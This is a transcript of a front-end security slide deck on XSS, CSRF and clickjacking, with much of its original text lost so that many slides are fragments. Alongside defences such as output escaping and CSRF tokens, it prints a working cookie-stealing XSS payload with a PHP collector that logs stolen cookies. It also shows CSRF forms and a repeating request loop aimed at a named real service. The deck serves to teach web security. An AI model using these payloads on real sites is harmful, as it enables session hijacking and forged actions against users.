F2e security
Transcript of "F2e security"

  5. Cross-site scripting (XSS)
  6. XSS
  7. • Cookie • DOM • …
  8. Yupoo XSS
  9. alert
  10. JavaScript (payload injected into the vulnerable page; it sends the victim's cookie to the attacker's collector):
        var img = new Image();
        img.src = "get_cookie.php?var=" + encodeURI(document.cookie);
      PHP (the collector that stores each received cookie in a timestamped file):
        <?php
        if (isset($_GET['var'])) {
            file_put_contents('./cookie/' . time() . '.txt', urldecode($_GET['var']));
        }
  12. • Filter input, escape output • Cookie • noscript?
  14. • http://en.wikipedia.org/wiki/Cross-site_scripting
      • http://www.gracecode.com/archives/2517
      • http://www.gracecode.com/archives/2491
      • http://ha.ckers.org/xss.html
      • http://www.xssed.com/
  15. CSRF (Cross Site Request Forgery)
  16. <img src="http://.../del.php?id=64" />
  17. <form action="http://jiwai.de/wo/status/update" method="post">
          <textarea name="jw_status"></textarea>
          <input type="submit" />
      </form>
  18. • GET • POST
  19. setInterval(function () {
          var img = new Image();
          var message = "";  // the message text on the slide was lost in extraction
          var api = "http://jiwai.de/wo/status/update";
          img.src = api + "?jw_status=" + message + "&t=" + +new Date();
      }, 1000);
  21. • GET / POST / Cookie • Referer • Token
  22. • _tb_token_ • Referer
  23. • http://en.wikipedia.org/wiki/Cross-site_request_forgery
      • http://www.cgisecurity.com/csrf-faq.html
      • http://www.80sec.com/csrf-securit.html
      • http://www.playhack.net/view.php?id=31
  24. Twitter Clickjacking
  25. 1. iframe Twitter 0  2. “ ”  3. Twitter
  27. CSRF
  28. Cookie Session
  29. • “JS ”
  30. Q&A
  31. alert(/tHx/).replace(/.+/, eval);